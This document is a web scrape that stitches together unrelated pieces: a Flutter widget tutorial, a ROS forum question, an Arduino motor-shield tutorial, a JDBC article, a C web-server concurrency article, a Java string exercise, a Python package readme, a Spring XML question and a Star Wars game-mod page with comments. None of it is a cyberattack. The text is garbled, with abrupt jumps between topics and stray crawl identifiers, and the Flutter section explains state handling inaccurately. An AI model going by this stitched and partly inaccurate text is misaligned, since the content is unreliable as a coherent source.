This new application project which comes by default with a demonstrating application. We have also looked at the various folders and files that are organized in the sample project and inspected each one for their purpose. Finally we have checked out the code within the main.dart file which is the starting point for the app execution and had our first app run. Phew! That's some important info we have covered so far and we're just getting started yet. In this article, we shall look at basically what widgets are and observe the two main categories of widgets on which the entire flutter development mainly runs on.
Read:
Article 1 - Setting Things up and Getting Started
Article 2 - Understanding App Structure and Anatomy
Article 3 - Understanding the main.dart and flow of execution - First run
What is a Widget?
Let's revisit the term "Widget" we have looked at sometime back in a previous article. A Widget can be termed as an individual component or a block of view that is presented either visibly or invisibly (let's look at these things as we dive in further) on the app screen. In Flutter everything we see or build to be presented on the view is a Widget. Even the entire app we run is somewhat considered as a "Widget" by the flutter runtime. This enables us to create reusable components which are faster to load and can be asynchronous towards each other. This can also benefit us in building an application in a modular manner rather than in a monolithic way and also helps towards fast reloading (or the hot reloading as it is termed by flutter) where in only that "Widget" part shall be reloaded over a code change instead of the entire application reloading. This helps in faster development as well for us.
Now coming to the Visible and Invisible part; When we're trying to build an application by means of modules wherein each block shall be placed on the other; we shall look forward to arranging the blocks in some manner so as to bring a good user experience on the app. We arrange the blocks (or the widgets) horizontally, vertically in an order which looks best for the user to interact with the app. This we call it as a Layout; and in Flutter we create layouts of widget arrangement by means of widgets again! And these Layout widgets lay the child widgets or the content widgets in a defined manner over the screen. Since these widgets only form the skeletal structure for a layout and they themselves can't be seen - we call them invisible. On the other hand there are the visible widgets such as a Text, Button or a Label which the user can see in some fashion laid out by these invisible widgets; we can call them as Visible widgets.
Widgets - Stateless or Stafeful?
When we run our application, internally the flutter runtime calls the "Widget" that has been passed onto the runApp() method. This "Widget" is basically the entire thing that is shown on the screen. It uses the data that we pass to it to be presented (or not be passed in cases like labels), and Once the Widget has been rendered on the screen the Widget remains "immutable". Meaning there's nothing to change on the Widget or be persisted when the widget is reloaded on the screen. Each time the screen loads the widget, each time the widget is re-rendered with a new "state", with no memory about its old state. This kind of behavior is what we call "Stateless" and these kind of Widgets are called "Stateless Widgets". The other kind of Widgets which do keep memory of their previous "state" are called "Stateful Widgets".
"Stateless Widgets have no memory of their previous existence while Stateful widgets keep track of their old state."
A "State" is nothing but the data which has been presented or computed in a Widget's lifetime. When we kill the application or do some operation which refreshes the screen, this piece of computed or presented "data" on the Widget can be ignored or kept track for future use. This behavior differentiates a Stateful Widget from a Stateless Widget.
Stateless Widgets and their volatile Memory
Let's take the example of a Button and a Counter, and the button shall increase the count of the counter whenever we tap on the button. Let's write a small Widget code for this presentation.
import 'package:flutter/material.dart'; class CounterPage extends StatelessWidget { int counter = 0; @override Widget build(BuildContext context) { // TODO: implement build return Scaffold( appBar: AppBar( title: Text('My App'), ), body: Column( children: <Widget>[ Text('The Counter is $counter'), RaisedButton( child: Text('Click'), onPressed: () { counter++; print(counter); }, ) ], ), ); } }
In this case, we have a Button with an onPressed event handler that is invoked each time the button is tapped. And there we increment the counter which is also being shown over the screen. Theoretically this should work, but when we actually tap the button nothing happens; the counter stays there without any change.
And we can see that the counter is actually incremented basing on the console output we print within the button click handler. Why? This is because, even though we tap the button which internally causes a variable to be changed; this is not reported onto the widget causing it to reload.
"A Stateless widget never reloads keeping its data persistent overall."
The method responsible for a widget repaint is the build() method which is invoked when to present a widget over the app screen; but for a Stateless widget this seldom happens and when one happens; the entire widget along with the data variables it holds are reloaded with their default values causing the old values to be reset without any persistence. This is where the Stateful widget comes in handy: for widgets which need to hold a set of values over time.
Stateful Widgets and their Persistence
A Stateful widget on the other hand keeps a track of a set of variables on change of which the widget is invoked to be repainted on the screen without having to reset those set of variables. This helps us to re-render some or the entire widget with the new changes that have been augmented on those variables. But creating a Stateful widget is a bit complex than building a Stateless widget.
"A Stateful widget is a sort of Stateless Widget with an extra piece of State tracking."
A Stateful Widget is a widget class linked to a State class, and whenever the State changes; the Widget also changes. Let's try changing our CounterPage class into a Stateful widget as below:
import 'package:flutter/material.dart'; class CounterPageStateful extends StatefulWidget { @override State<StatefulWidget> createState() { // TODO: implement createState return CounterPageState(); } } class CounterPageState extends State<CounterPageStateful> { int counter = 0; @override Widget build(BuildContext context) { // TODO: implement build return Scaffold( appBar: AppBar( title: Text('My App'), ), body: Column( children: <Widget>[ Text('The Counter is $counter'), RaisedButton( child: Text('Click'), onPressed: () { setState(() { counter++; }); print(counter); }, ) ], ), ); } }
We have the CounterPageStateful widget which extends a "Stateful" widget instead of the usual Stateless Widget. And then we have a separate CounterPageState class which extends a State class with a type of CounterPageStateful. And within the CounterPageStateful class we have the CounterPageState instance being returned in the createState() override method. What this means is that basically we create a two-way binding between the "Widget" and its "State". And whenever something in this "State" changes, the Widget is immediately invoked off the build() method that repaints the widget onto the screen. And since we need to maintain this "State" information out of the Widget so that the "State" information is not affected by the rebuild of the Widget; we have this State maintained outside of the Widget with an internal link. Observe the counter variable within the onPressed event handler of the button; now it sits inside a method called setState(). This method acts as a sort of region wherein the variables are modified and are persisted over the repaint. And whenever something in this setState() changes, the build() is invoked keeping hold of the changed values. Let's run this code now and look at our counter in action.
In this way, we can make use of Stateless and Stateful widgets depending on the kind of widgets we are trying to develop.
Published 12 days ago
|
http://referbruv.com/blog/posts/flutter-for-beginners-understanding-stateful-and-stateless-widgets
|
CC-MAIN-2020-10
|
refinedweb
| 1,412
| 57
|
Despite having followed the outlined steps, msg folder, change CMakeLists.txt and package.xml, compilation and sourcing, and verification (rosmsg list | grep Age displays Age inside my package), I still get ImportError: No module named odom_22.msg. Can anyone offer assistance?
rosmsg list | grep Age
ImportError: No module named odom_22.msg
This from odom_22.msg import Age is my import line, and I double checked to make sure the msg directory is inside my package.
from odom_22.msg import Age
asked
01 Oct '18, 21:31
dylmyl1029
0
accept rate:
0%
Never mind. I think the platform is just buggy. I restarted my computer and it works fine. Although now I have the rosdep view is empty: call 'sudo rosdep init' and 'rosdep update' when I try to run rostopic echo /age_info.
Hmmm, and now, even though I have changed nothing, it is giving me the original error again.
Got it. Had to recompile for every time my page reloaded, then I could use roslaunch. When I switched to the to terminal window to check the output with rostopic echo /age_info, I had to recompile again in this window with the roslaunch still running in the other window. Then the whole thing worked.
rostopic echo /age_info
answered
02 Oct '18, 12:43
Once you sign in you will be able to subscribe for any updates here
Answers
Answers and Comments
Markdown Basics
learn more about Markdown
Question tags:
2.3 ×3
importerror ×2
question asked: 01 Oct '18, 21:31
question was seen: 151 times
last updated: 02 Oct '18, 12:43
Exercise 2.3 Solution
Exercise, 2.3 ROS in 5 days, "No name "msg" in module "my_subscriber""
ImportError, what is a problem here?
First time here? Check out the FAQ!
|
http://forum.theconstructsim.com/questions/1318/exercise-23-import-error
|
CC-MAIN-2019-09
|
refinedweb
| 292
| 74.9
|
JDK 6 and JDBC 4.0 Advanced Concepts
This article addresses some of the advanced data management concepts starting with a new annotations capability added to the JDBC 4.0 specification.
Annotations
Annotations were introduced into the language with JDK 1.5, and now they are making an impact with JDBC 4.0. An annotation is a declarative programming model where comments, associated with a code element, are used to inject code at runtime.
The PreparedStatement example in this chapter can be rewritten as an annotation, greatly reducing the amount of code required by the application developer.
The annotation solution consists of two elements. The first is the declaration of a Query Interface, extending an interface BaseQuery in the java.sql. package. And the second element is a QueryObject used to execute the query.
Start by declaring the interface. You will not have to implement the interface; that will be done for you based on the declared annotation. The annotation is a @Select, it takes the SQL statement as a parameter and maps the parameter of the method with the ?# IN parameter on the statement. Note that unlike the ResultSet object returned in the previous example (in Chapter 6 "Persisting Your Application Using Databases" Professional Java, JDK 6 Edition, Wrox, 2007, ISBN: 978-0-471-77710-6), the DataSet collection is typed with your user-defined class Car:
package wrox.ch6.jdbc; import java.sql.BaseQuery; import java.sql.DataSet; import java.sql.Select; public interface QueryAnnotationExample extends BaseQuery { @Select(sql="SELECT ID, MODEL, MODEL_YEAR FROM CAR WHERE MODEL_YEAR = ?1") public DataSet<Car> getCarsModelYear( String year ); }
Next, use the object factory to create and execute this statement. That is, by passing the query interface as a parameter, all the work was done for you, and the results are mapped to the collection of objects you specified in the interface:
public void testQueryAnnotation( ) { QueryAnnotationExample qae = null; try { String url = "jdbc:derby://localhost:1527/wrox;create=true"; Connection con = DriverManager.getConnection(url , "APP", "password"); qae = con.createQueryObject(QueryAnnotationExample.class); } catch (SQLException e) { e.printStackTrace(); } Collection<Car> cars = qae.getCarsModelYear("1999");
Here is a simple loop to print out the results of the query:
for ( Car c : cars) { System.out.println(" car id=" + c.getId() + " model="+c.getModel() + " year="+ c.getYear() ); } }
When this query executes the output will be:
car id=1 model=Honda Accord year=null
You might be thinking, "The year parameter couldn't have been null. I was filtering on 1999. Why is the year parameter returning null from the query?"
The answer relates back to the Car class definition. The annotation API maps the columns to properties by name. So ID mapped ID, model mapped to model, but year didn't map to MODEL_YEAR as it was declared in the database. The solution is to either change the parameter to be the same name as the database columns or add a column name annotation to the Car class. @ResultColumn(name="MODEL_YEAR") tells the annotation API the name of the column to which to map the year field.
import java.sql.ResultColumn; public class Car { Long id; String model; @ResultColumn(name="MODEL_YEAR") String year;
If you re-execute the example the model year will be populated with the correct information from the statement. A huge time saver compared to working with traditional PreparedStatement.
The next section discusses supporting database transactions.
Managing Transactions
Transaction management is extremely important when dealing with data sources. Transaction management ensures data integrity and data consistency; without it, it would be very easy for applications to corrupt data sources or cause problems with the synchronization of the data. Therefore, all JDBC drivers are required to provide transaction support.
What Is a Transaction?
To explain transactions best, take using an ATM as an example. The steps to retrieve money are as follows:
- Swipe your ATM card.
- Enter your PIN.
- Select the withdrawal option.
- Enter the amount of money to withdraw.
- Agree to pay the extremely high fee.
- Collect your money.
If anything was to go wrong along the way and you didn't receive your money, you would definitely not want that to reflect on your balance. So a transaction encompasses all the preceding steps and has only two possible outcomes: commit or rollback. When a transaction commits, all the steps had to be successful. When a transaction fails, there should not be any damage done to the underlying data source. In this case, the data that stores your account balance!
Standard Transactions
JDBC transactions are extremely simple to manage. Transaction support is implemented by the DBMS, which eliminates your having to write anything — code-wise — that would be cumbersome. All the methods you need are contained in the Connection object. There are two main methods you need to be concerned about: Connection.commit and Connection.rollback. There isn't a begin transaction method because the beginning of a transaction is implied when the first SQL statement is executed.
JDBC 3.0 introduced a concept called a savepoint. Savepoints allow you to save moments in time inside a transaction. For example, you could have an application that sends a SQL statement, then invokes a savepoint, tries to send another SQL statement, but a problem arises and you have to rollback. Now instead of rolling back completely, you can choose to rollback to a given savepoint. The following code example demonstrates JDBC transactions and the new savepoint method, Connection.setSavepoint:
Statement stmt = cConn.createStatement(); int nRows = stmt.executeUpdate("INSERT INTO PLAYERS (NAME) " + VALUES ('Roger Thomas')"); // Create our save point Savepoint spOne = cConn.setSavepoint("SAVE_POINT_ONE"); nRows = stmt.executeUpdate("INSERT INTO PLAYERS (NAME) " + VALUES ('Jennifer White')"); // Rollback to the original save point cConn.rollback(spOne); // Commit the transaction. cConn.commit();
From this example, the second SQL statement never gets committed because it was rolled back to SAVE_POINT_ONE before the transaction was committed.
This article is adapted from Professional Java by W. Clay Richardson (Wrox, 2007, ISBN: 978-0-471-77710-6), from Chapter 6, "Persisting Your Application Using Databases."
Copyright 2007 by WROX. All rights reserved. Reproduced here by permission of the publisher.
|
http://www.codeguru.com/print/java/article.php/c13447/JDK-6-and-JDBC-40-Advanced-Concepts.htm
|
CC-MAIN-2015-27
|
refinedweb
| 1,013
| 50.53
|
A Multithreading Server
The multithreading_server shown in Listing 3 avoids the context-switch downside of the forking_server but faces challenges of its own. Each process has at least one thread of execution. A single multithreaded process has multiple threads. The threading_server is multithreaded.
Listing 3. threading_server.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/in.h> #include <signal.h> #include <pthread.h> #include "utils.h" /* thread routine */ void* handle_client(void* client_ptr) { pthread_detach(pthread_self()); /* terminates on return */ /* read/write socket */ int client = *((int*) client_ptr); /* request */ char buffer[BUFF_SIZE + 1]; bzero(buffer, sizeof(buffer)); int bytes_read = recv(client, buffer, sizeof(buffer), 0); if (bytes_read < 0) error_msg("Problem with recv call", false); /* response */ char response[BUFF_SIZE * 2]; bzero(response, sizeof(response)); generate_echo_response(buffer, response); int bytes_written = send(client, response, strlen(response), 0); if (bytes_written < 0) error_msg("Problem with send call", false); close(client); return NULL; } /* detached thread terminates on return */ int main() { char buffer[BUFF_SIZE + 1]; struct sockaddr_in client_addr; socklen_t len = sizeof(struct sockaddr_in); /* listening socket */ int sock = create_server_socket(false); /* connections */ while (true) { int client = accept(sock, (struct sockaddr*) &client_addr, &len); if (client < 0) error_msg("Problem accepting a ↪client request", true); announce_client(&client_addr.sin_addr); /* client handler */ pthread_t tid; int flag = pthread_create(&tid, /* id */ NULL, /* attributes */ handle_client, /* routine */ &client); /* routine's arg */ if (flag < 0) error_msg("Problem creating thread", false); } return 0; }
The threading_server mimics the division-of-labor strategy in the forking_server, but the client handlers are now threads within a single process instead of forked child processes. This difference is huge. Thanks to COW, separate processes effectively have separate address spaces, but separate threads within a process share one address space.
When a client connects, the threading_server delegates the handling to a new thread:
pthread_create(&tid, /* id */ NULL, /* attributes */ handle_client, /* routine */ &client); /* arg to routine */
The thread gets a unique identifier and executes a thread routine—in this case, handle_client. The threading_server passes the client socket to the thread routine, which reads from and writes to the client.
How could the WordGame be ported to the forking_server? This server must ensure one WordGame instance per client. The single WordGame:
WordGame game; /* one instance */
could become an array of these:
WordGame games[BACKLOG]; /* BACKLOG == max clients */
When a client connects, the threading_server could search for an available game instance and pass this to the client-handling thread:
int game_index = get_open_game(); /* called in main so thread safe */
In the function main, the threading_server would invoke get_open_game, and each client-handling thread then would have access to its own WordGame instance:
games[game_index].socket = client; pthread_create(&tid, /* id */ NULL, /* attributes */ handle_client, /* routine */ &games[game_index]); /* WordGame arg */
A WordGame local to the thread_routine also would work:
void* handle_client(void* client_ptr) { WordGame game; /* local so thread safe */ /* ... */ }
Each thread gets its own copy of locals, which are thereby threadsafe. Of importance is that the programmer rather than the system ensures one WordGame per client.
The threading_server would be more efficient with a thread pool. The pre-forking strategy used in FastCGI for processes extends nicely to threads.
A Polling Server
Listing 4 is a polling_server, which resembles the forking_server in some respects and the threading_server in others.
Listing 4. polling_server.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/in.h> #include <signal.h> #include <sys/epoll.h> #include <fcntl.h> #include <errno.h> #include "utils.h" #define MAX_BUFFERS (BACKLOG + 1) /* max clients + listener */ int main() { char buffer[BUFF_SIZE + 1]; /* epoll structures */ struct epoll_event event, /* server2epoll */ event_buffers[MAX_BUFFERS]; /* epoll2server */ int epollfd = epoll_create(MAX_BUFFERS); /* arg just a hint */ if (epollfd < 0) error_msg("Problem with epoll_create", ↪true); struct sockaddr_in client_addr; socklen_t len = sizeof(struct sockaddr_in); int sock = create_server_socket(true); /* non-blocking */ /* polling */ event.events = EPOLLIN | EPOLLET; /* incoming, edge-triggered */ event.data.fd = sock; /* register listener */ if (epoll_ctl(epollfd, EPOLL_CTL_ADD, sock, &event) < 0) error_msg("Problem with epoll_ctl call", true); /* connections + requests */ while (true) { /* event count */ int n = epoll_wait(epollfd, event_buffers, MAX_BUFFERS, -1); if (n < 0) error_msg("Problem with epoll_wait call", true); /* -- If connection, add to polling: may be none or more -- If request, read and echo */ int i; for (i = 0; i < n; i++) { /* listener? */ if (event_buffers[i].data.fd == sock) { while (true) { socklen_t len = sizeof(client_addr); int client = accept(sock, (struct sockaddr *) &client_addr, &len); /* no client? */ if (client < 0 && (EAGAIN == errno || ↪EWOULDBLOCK == errno)) break; /* client */ fcntl(client, F_SETFL, O_NONBLOCK); /* non-blocking */ event.events = EPOLLIN | EPOLLET; /* incoming, edge-triggered */ event.data.fd = client; if (epoll_ctl(epollfd, EPOLL_CTL_ADD, client, &event) < 0) error_msg("Problem with epoll_ctl ADD call", false); announce_client(&client_addr.sin_addr); } } /* request */ else { bzero(buffer, sizeof(buffer)); int bytes_read = recv(event_buffers[i].data.fd, buffer, ↪sizeof(buffer), 0); /* echo request */ if (bytes_read < 0) { char response[BUFF_SIZE * 2]; bzero(response, sizeof(response)); generate_echo_response(buffer, response); int bytes_written = send(event_buffers[i].data.fd, response, ↪strlen(response), 0); if (bytes_written < 0) error_msg("Problem with ↪send call", false); close(event_buffers[i].data.fd); /* epoll stops polling fd */ } } } } return 0; }
The polling_server is complicated:
while (true) /* listening loop */ for (...) /* event loop */ if (...) /* accepting event? */ while (true) /* accepting loop */ else /* request event */
This server executes as one thread in one process and so must support concurrency by jumping quickly from one task (for example, accepting connections) to another (for example, reading requests). These nimble jumps are among nonblocking I/O operations, in particular calls to accept (connections) and recv (requests).
The polling_server's call to accept returns immediately:
If there are no clients waiting to connect, the server moves on to check whether there are requests to read.
If there are waiting clients, the polling_server accepts them in a loop.
The polling_server uses the epoll system library, declaring a single epoll structure and an array of these:
struct epoll_event event, /* from server to epoll */ event_buffers[MAX_EVENTS]; /* from epoll to server */
The server uses the single structure to register interest in connections on the listening socket and in requests on the client sockets. The epoll library uses the array of epoll structures to record such events. The division of labor is:
The polling_server registers events of interest with epoll.
The epoll library records detected events in epoll_event structures.
The polling_server handles epoll-detected events.
The polling_server is interested in incoming (EPOLLIN) events and in edge-triggered (EPOLLET) rather than level-triggered events. The distinction comes from digital logic design but examples abound. A red traffic light is a level-triggered event signaling that a vehicle should remain stopped, whereas the transition from green to red is an edge-triggered event signaling that a vehicle should come to a stop. The polling_server is interested in connecting and requesting events when these first occur.
A for loop iterates through detected events. Above the loop, the statement:
int n = epoll_wait(epollfd, event_buffers, MAX_EVENTS, -1);
gets an event count, where the events are either connections or requests.
My polling_server takes a shortcut. When the server reads a request, it reads only the bytes then available. Yet the server might require several reads to get the full request; hence, the server should buffer the partials until the request is complete. I leave this fix as an exercise for the reader.
How could the WordGame be ported to the polling_server? This server, like the threading_server, must ensure one WordGame instance per client and must coordinate a client's access to its WordGame. On the upside, the polling_server is single-threaded and thereby threadsafe. Unlike the forking_server, the polling_server does not incur the cost of context switches among forked children.
Conclusions
Which is the best way to client concurrency? A reasoned answer must
consider traditional multiprocessing and multithreading, together with
hybrids of these. The
evented I/O way that epoll exemplifies also
deserves study. In the end, the selected method must meet the challenges
of supporting concurrency across real-world Web applications under
real-world conditions.
Resources
The three Web servers together with an iterative_server are available at.
For more on Node.js, see:. 21 min ago
- GIMP is certainly a graphic
6 hours 23 min ago
- Thanks For Your Sharing
11 hours 8 min ago
- Studying linux, and looking
14 hours 34 min ago
- voting for Best Linux Distribution
23 hours 1 min ago
- tizen vs android
1 day 3 hours ago
- i switch my choice from KDE
1 day 3 hours ago
- Ubuntu
1 day 6 hours ago
- Belanja Online
1 day 8 hours.
|
http://www.linuxjournal.com/content/three-ways-web-server-concurrency?page=0,1&quicktabs_1=1
|
CC-MAIN-2013-48
|
refinedweb
| 1,378
| 55.03
|
Java String Exercises: Replace each substring of a given string that matches the given regular expression with the given replacement
Java String: Exercise-25 with Solution
Write a Java program to replace each substring of a given string that matches the given regular expression with the given replacement.
Sample string: "The quick brown fox jumps over the lazy dog."
In the above string replace all the fox with cat.
Pictorial Presentation:
Sample Solution:
Java Code:
public class Exercise25 { public static void main(String[] args) { String str = "The quick brown fox jumps over the lazy dog."; // Replace all the 'dog' with 'cat'. String new_str = str.replaceAll("fox", "cat"); // Display the strings for comparison. System.out.println("Original string: " + str); System.out.println("New String: " + new_str); } }
Sample Output:
Original string: The quick brown fox jumps over the lazy dog. New String: The quick brown cat jumps over the lazy dog.
Flowchart:
Java Code Editor:
Improve this sample solution and post your code through Disqus
Previous: Write a Java program to replace all the 'd' characters with 'f' characters.
Next: Write a Java program to check whether a given string starts with the contents of another string.
What is the difficulty level of this exercise?
New Content: Composer: Dependency manager for PHP, R Programming
|
https://www.w3resource.com/java-exercises/string/java-string-exercise-25.php
|
CC-MAIN-2019-18
|
refinedweb
| 211
| 56.86
|
Dual Motor TinyShield Tutorial
The Dual Motor Shield allows you to drive two independently controlled DC brushed motors. Create your own tiny robots or drones! Using two of the super miniature but very powerful 2mm x 2mm TI DRV8837 Motor Driver (H-Bridge) IC, this shield will allow for up to 1.8A per channel and operate motors between 1.8 and 11V. This shield includes a built-in motor controller to make driving motors simple using the ATtiny841 Arduino Library.
You can use up to four Motor Shields at a time to use up to eight motors.
All the connections to the motors use standard 0.1″ spaced holes to solder motor leads.
Learn more about the TinyDuino Platform
Note: While the DRV8837 supports 1.8A @ 11V, we highly recommend operating under 500mA @ 5V per channel unless you have some really good heat sinking in place.
Technical DetailsTI DRV8837 H-bridge motor driver
- Low MOSFET On-Resistance: HS + LS 280mOhm
- 1.8A Max Drive Current (Recommend 500mA max)
- 1.8V to 11V Motor Operating Supply Voltage Range
-
- Up to 4 Dual Motor Shields can be stacked together in one Tiny stack, however, the I2C address needs to be different for each Shield. This can be changed with resistors R1 and R2 (more information at the bottom of the page).
-.
- Be sure that your power supply is sufficient to operate these motors as well as your logic – batteries work the best. If you are running both the motors and the logic off of one power supply, we recommend avoiding using a switching power supply as the transients caused can potentially damage items connected to the logic side.
- You do not have to use motors with JST connectors, the board comes in two variations depending on your needs so that you can solder your own motors. The board variation with the JST connectors makes it easy to connect the motors fast without needing soldering equipment.
Materials
Hardware
- TinyDuino and USB TinyShield OR
- Dual Motor TinyShield (with or without JST connectors, depending on the motors you use)
- Motors: there are a few options: 200:1 Gear Reduction Motor (which will have higher torque) and the 30:1 Gear Reduction Motor (which will have higher speed)
- Micro USB Cable
Software
Hardware Assembly
Connect your processor board of choice to your Dual Motor Shield using the 32 pin tan connectors. Then plug in the battery and the motor(s) to your Motor Shield.
If you selected the Dual Motor Shield without the JST pin connectors, you will need to solder the motors of your choice to the board. The ground pin is noted in the silkscreen on the board with a line parallel to the pads. In other words, solder the black (GND) wire to the left, noted through-hole points, and the red (POWER) wire to the rights, unmarked through-hole point. Although the red and black color scheme is an industry standard, the wire colors on your motors may be different. Always consult component documentation before soldering.
NOTE: In order for the motors to have enough power to move, there must be an external power supply. Here, we use a battery.
Software Setup
You need the ATtiny841 library in order to use the example program in this tutorial. A zip file of the library is included under the Software Materials. To install an Arduino library, check out our Library Installation Page.
Open the Basic Motor Example program in the Arduino IDE, plug your TinyDuino stack into your PC using the MicroUSB cable, ensure your Tools selections are correct for your processor board, and click the upload button.
Code
//------------------------------------------------------------------------------- // TinyCircuits Dual Motor Driver Basic Example // Last modified 24 Feb 2020 // //(NO_R_REMOVED);//this value affects the I2C address, which can be changed by //removing resistors R1 or R2. Then the corresponding R1_REMOVED, //R2_REMOVED, R1_R2_REMOVED can be set. //Default is NO_R_REMOVED #if defined (ARDUINO_ARCH_AVR) #define SerialMonitorInterface Serial #elif defined(ARDUINO_ARCH_SAMD) #define SerialMonitorInterface SerialUSB #endif int maxPWM=1000; int steps=10; int stepSize=maxPWM/steps; void setup(){ SerialMonitorInterface.begin(9600); Wire.begin(); while(!SerialMonitorInterface)//This will block until the Serial Monitor is opened on TinyScreen+/TinyZero platform! //The value passed to begin() is the maximum PWM value, which is 16 bit(up to 65535) //This value also determines the output frequency- by default, 8MHz divided by the maxPWM value if(motor.begin(maxPWM)){ SerialMonitorInterface); } }
Once the program is uploaded to the board, open up your Serial Monitor (you can find this under the Tools tab, or magnifying glass icon in the top right of the Arduino IDE), and then you should see your motors moving back and forth. If you want the motors to begin moving as soon as the program is uploaded and power is connected, you can comment out the line:
//while(!SerialMonitorInterface)
in the setup() loop.
More Motors?!
If you want to add more motors to your project, you can do that! All you have to do is remove some address resistors noted on the board in order to use other, non-conflicting I2C addresses. You can use up to four different Dual Motor Shields at a time. You may see the line in the program noted:
MotorDriver motor(NO_R_REMOVED); // Default address with no Resistors removed
To add more motor objects for different Shields, you need to initialize the motor objects with different I2C addresses as well as removing the respective address resistors on the boards:
MotorDriver motor2(R1_REMOVED); // Add a second Dual Motor TinyShield by removing resistor R1
MotorDriver motor3(R2_REMOVED); // Add a third Dual Motor TinyShield by removing resistor R2
MotorDriver motor4(R1_R2_REMOVED); // Add a fourth Dual Motor TinyShield by removing resistors R1 and R2
Now get out there and make something move!
Downloads
If you have any questions or feedback, feel free to email us or make a post on our forum. Show us what you make by tagging @TinyCircuits on Instagram, Twitter, or Facebook so we can feature it.
Thanks for making with us!
|
https://learn.tinycircuits.com/Motors/Dual-Motor_TinyShield_Tutorial/
|
CC-MAIN-2022-33
|
refinedweb
| 995
| 59.23
|
This is a minimalist tool to run multiple parallel tasks in python.
Most programming languages have full support for threads but often require a lot of overhead work even for the simplest tasks. This package aims to provide an easy way to parallelize these tasks with very little effort.
First install the package.
pip install mparallel
In your python modules, just import it and use it as follows:
import time import mparallel def some_expensive_or_waiting_task(some_param): # ... time.sleep(2) return some_param def my_method(): runner = mparallel.Runner() for i in range(10): runner.add_task(some_expensive_or_waiting_task, i) print runner.results()
You can see the tasks are being run in parallel from the previous code because even though they are being started in order (0..9), the final output will likely appear in a different order. Also, the total waiting time will be less than 20 seconds, which is the time it would take to serially run.
|
https://pypi.org/project/mparallel/
|
CC-MAIN-2017-04
|
refinedweb
| 153
| 58.18
|
13 September 2012 12:00 [Source: ICIS news]
LONDON (ICIS)--Here is Thursday’s midday European oil and chemical market summary from ICIS.
CRUDE: October WTI: $97.10/bbl, up 9 cents/bbl. October BRENT: $116.10/bbl, up 14 cents/bbl
Crude prices were showing small gains as traders awaited the announcement from the US Federal Reserve later in the day on its plans for further stimulus to boost the ?xml:namespace>
NAPHTHA: $989-991/tonne, down $11/tonne
The cargo range lost ground from Wednesday afternoon as a result of a weaker crack spread. October swaps were assessed at $973-974/tonne.
BENZENE: $1,480-1,530/tonne, down $20/tonne on the sell side
September offers were lower at $1,530/tonne this morning but there were no firm corresponding bids. October was offered at $1,390/tonne while the first half of the month was still at a sharp premium, with offers at $1,490/tonne and no firm bids.
STYRENE: $1,730-1,780/tonne, down $10-20/tonne
Offers for September were at $1,780/tonne this morning and the range was assessed lower following a spike seen in recent days. October was backwardated with offers at $1,760
|
http://www.icis.com/Articles/2012/09/13/9594734/noon-snapshot-europe-markets-summary.html
|
CC-MAIN-2015-22
|
refinedweb
| 205
| 64.2
|
.
<property name="prefix" value="/WEB-INF/jsp/"/>
and
p:prefix="/WEB-INF/jsp/"
??
Basically, either version is acceptable (in Netbeans or any other development environment) as they are just two different alternatives to do the same thing. The only requirement is that for the second version, the "p:" namespace prefix needs to be declared in your top level "beans" xml element.
So yeah, you can choose whichever way you are happier with.
Note, I do realise that there are other differences in the two xml snippets above (the bean's class and the viewClass property). If that is what you are referring to, then there really isn't a path to translate the first into the second, they are two different (albeit very similar) things.
If I have missed the point somewhere, can you please elaborate!
|
https://www.experts-exchange.com/questions/28317132/Spring-XML-document.html
|
CC-MAIN-2018-09
|
refinedweb
| 136
| 61.67
|
.
It is the patch 3 for the 1.06d&1.06e. Probably you will be curious about because this patch is for both versions. The reason is how it works with both versions and the unique difference is to run with the new scenarios adding the Star Wars Galaxy, it is a feature only from the 1.06e.
Another point. Probably the new scenarios runs with game versions before 1.06d. Never with 1.06d.
For help you downloading the mod, I have set as Old-Obsolete the versions which you do not need if you have the game updated with the last 1.06e.
The last versions are set as Active.
DLC Lumens is only neccesary if you want play with the First Order or against this faction.
These are the additions from the patch 3:
-Cells improvements.
-Ships improvements.
-Descriptions improved.
-First Order can build all the ground units.
-New Galaxies scenarios added.
-Small fixes and improvements in other files.
-Previous patches additions.
Now. You will need these things if you want play the mod.
Moddb.com
+
Moddb.com
This is the basic installation.
-Uncompress the mod with winrar in the main game folder.
-Search the file REMEMBER.CFG into the new folder named Polaris_Sector_Alliance and cut it, paste the file into the folder ..\Documents\My Games\Polaris Sector\.. , overwrite the file into it.
-Launch the game. Remember, this version version from the mod is only translated to English. You must select the English in the game settings.
-Mod uninstall. Open the file REMEMBER.CFG into the folder ..\Documents\My Games\Polaris Sector\.. and replace the line CurrentModPath "Polaris_Sector_Alliance/" by //CurrentModPath "Polaris_Sector_Alliance/"
The mod adds a complete list of credits if you want to know about them.
Polaris Sector Alliance 1.0b converts the new 4x game from Slitherine at a Star Wars 4x game very similar at concept to the old SW Rebellion game but...
Polaris Sector is a new 4x game created by Softwarware and published by Slitherine. This game has a lot of potential and two very good features,.
Polaris Sector 1.06e - Alliance mod patch 5 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for people which they...
Polaris Sector 1.06e - Alliance mod patch 5 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for the mod main file...
Polaris Sector 1.06e - Alliance mod patch 4 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for the mod main file...
Polaris Sector 1.06e - Alliance mod patch 3 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for the mod main file...
This file adds new scenario Galaxies for the mod, just uncompress it in the folder where you installed the Polaris Sector Alliance overwritting all files...
A small patch for improve the First Order ships in battle and some other small things. Just overwrite the mod content with the files inside this why does the Star wars galaxy only have two races to select how can i change this thanks
Edit: I just downloaded the SWGalaxies maps and the Star wars galaxy ER says 100 stars 8 races but no races appear
Hi, I have the latest version installed and found a small bug.
When playing as the Imperials I did unlock Fighters LvL2 and got the TIE Interceptor and TIE AdvancedMK2/Avenger unlocked. Only problem is, one of the weapon pylon slots on the TIE Avenger seems to be 1 pixel too short. Its the right lower pylon (on the second deck so to say)... so I just can build in 5 of possible 6 small pylons.
If its not a big hassle, can you provide a hotfix for it? Or at least tell me how I can fix it myself? ^^ One of those would be great... I will pause my game till I can use those Avengers in their full glory. Thanks for this awesome mod :-)
Any troubleshotting question. Go to my site Firefoxccmods.com
Blocked at my site? send me a private message with your ip.
This comment is currently awaiting admin approval, join now to view.
